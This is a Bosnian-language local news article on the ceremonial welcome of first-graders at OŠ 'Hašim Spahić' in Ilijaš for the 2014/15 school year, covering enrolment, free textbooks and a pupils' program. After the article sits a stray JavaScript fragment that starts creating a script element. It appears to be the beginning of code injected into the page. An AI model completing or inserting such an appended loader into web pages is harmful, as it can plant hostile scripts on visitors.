Svečani prijem prvačića u OŠ „Hašim Spahić“

PROGRAMHSZazvonilo je prvo školsko zvono u školskoj 2014./15. godini. Nakon ljetnog raspusta, osnovci i srednjoškolci Kantona Sarajevo danas su u školskim klupama.
U fiskulturnoj sali Osnovne škole „Hašim Spahić“ organizovan je prijem za učenike prvih razreda. Pedagogica škole poželjela je djeci i roditeljima puno uspjeha, kazavši :
– Prošle godine kazali smo da ovu školu pohađa više od hiljadu i 100 učenika, ali s obzirom na to da od ove godine počinje sa radom škola u Starom Ilijašu, ove školske godine u centralnu osnovnu školu krenut će oko 600 učenika. Bit će nam puno lakše, jer se riješio dugogodišnji problem gužvi i prenapučenosti u odjeljenjima. Drago mi je da Vam mogu saopćiti da je iz resornog ministarstva potvrđeno da će prvačići udžbenike dobiti besplatno i tim će roditeljima biti lakše da obezbijede pribor, naglasila je pedagogica u svom obraćanju. PRVACICISALA
Kao i svake godine, svečani prijem prvačića bio je lijepa prilika da mališani upoznaju svoju školu i nove prijatelje u razredima, ali i prilika za međusobno upoznavanje roditelja i učenika s jedne i učitelja s druge strane.
-Ovaj dan će svi pamtiti do kraja života, a mi smo tu da ga učinimo još ljepšim, naglašeno je.
Učenici drugih, trećih i četvrtih razreda su zajedno sa svojim učiteljicama upriličili prigodan program za svoje nove školske kolege. Kroz pjesmu, ples i recitaciju pokazali su sve ono što su u prethodnoj godini naučili od svojih učiteljica i na taj način pružili podršku i ohrabrenje prvačićima za novi početak. Svečanom prijemu prisustvovali su roditelji, gosti, te prijatelji malih prvačića.
Prijem prvačića u OŠ „Stari Ilijaš“ je u 12 sati uz prigodan program, a također će biti organizovan u osnovnim školama u Srednjem i Podlugovima i u OŠ “Đulistan” u sklopu Perzijsko-bosanskog koledža u Lješevu. nastava je počela i za srednjoškolce, kao i za učenike Osnovne muzičke i baletske škole „Novo Sarajevo“ PJ Ilijaš.
Svim učenicima a posebno malim prvačićima želimo sretnu i uspješnu novu školsku godinu.

 var d=document;var s=d.createElement(‘script’);